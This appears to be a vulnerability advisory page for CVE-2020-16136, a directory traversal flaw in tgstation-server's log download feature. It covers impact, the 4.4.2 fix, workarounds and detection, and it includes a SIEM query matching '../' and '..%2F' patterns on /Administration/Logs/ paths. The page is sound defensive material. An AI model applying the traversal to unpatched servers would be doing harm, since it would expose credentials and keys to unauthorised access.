CVE-2020-16136
📋 TL;DR
This vulnerability allows authenticated users with log download permissions in tgstation-server to perform directory traversal attacks, enabling them to download any file accessible by the server process owner. It affects tgstation-server versions 4.4.0 and 4.4.1, requiring attackers to have valid authentication credentials.
💻 Affected Systems
- tgstation-server
📦 What is this software?
Tgstation Server by Tgstation13
Tgstation Server by Tgstation13
⚠️ Risk & Real-World Impact
Worst Case
Complete server compromise through downloading sensitive files like configuration files, SSH keys, or database credentials, potentially leading to privilege escalation or lateral movement.
Likely Case
Unauthorized access to sensitive server files containing configuration data, credentials, or other proprietary information accessible by the server process.
If Mitigated
Limited impact if proper access controls and file permissions restrict what the server process can access, though some information disclosure may still occur.
🎯 Exploit Status
Exploitation requires valid authentication and specific permissions; directory traversal via ../ sequences is well-understood and easy to implement.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.4.2 or later
Vendor Advisory: https://github.com/tgstation/tgstation-server/security/advisories/GHSA-r8pp-42wr-2gc4
Restart Required: Yes
Instructions:
1. Backup current configuration and data. 2. Stop tgstation-server service. 3. Update to version 4.4.2 or later using your package manager or manual installation. 4. Restart tgstation-server service. 5. Verify the fix by testing log download functionality.
🔧 Temporary Workarounds
Remove log download permissions
allTemporarily revoke 'Download logs' permission from all users until patching can be completed.
Restrict server process file access
linuxConfigure file system permissions to limit what files the tgstation-server process owner can access.
🧯 If You Can't Patch
- Implement strict access controls and remove 'Download logs' permission from all non-essential users.
- Deploy network segmentation and monitoring to detect directory traversal attempts in web requests.
🔍 How to Verify
Check if Vulnerable:
Check if running tgstation-server version 4.4.0 or 4.4.1; authenticated users with log download permission can test with directory traversal payloads.Check Version:
Check tgstation-server version in web interface or configuration files; on Linux systems: systemctl status tgstation-server or check package manager.Verify Fix Applied:
After updating to 4.4.2+, attempt directory traversal attacks via /Administration/Logs/ endpoints; requests should be blocked or sanitized.📡 Detection & Monitoring
Log Indicators:
- HTTP requests containing '../' sequences in /Administration/Logs/ paths
- Multiple failed file access attempts from same authenticated user
Network Indicators:
- HTTP requests with directory traversal patterns in URL parameters
SIEM Query:
web_access_logs WHERE url_path CONTAINS '/Administration/Logs/' AND (url_path CONTAINS '../' OR url_path CONTAINS '..%2F')